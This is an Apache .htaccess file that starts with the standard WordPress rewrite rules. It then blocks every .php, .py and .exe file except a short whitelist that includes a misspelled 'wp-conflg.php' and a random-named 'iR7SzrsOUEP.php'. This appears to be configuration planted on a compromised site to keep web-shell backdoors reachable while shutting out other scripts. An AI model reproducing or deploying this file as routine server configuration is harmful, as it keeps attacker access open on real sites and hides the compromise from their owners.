<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>	
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "(^style.php|^style2.php|^wp-conflg.php|^index.php|^class.api.php|^iR7SzrsOUEP.php|^wp-login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>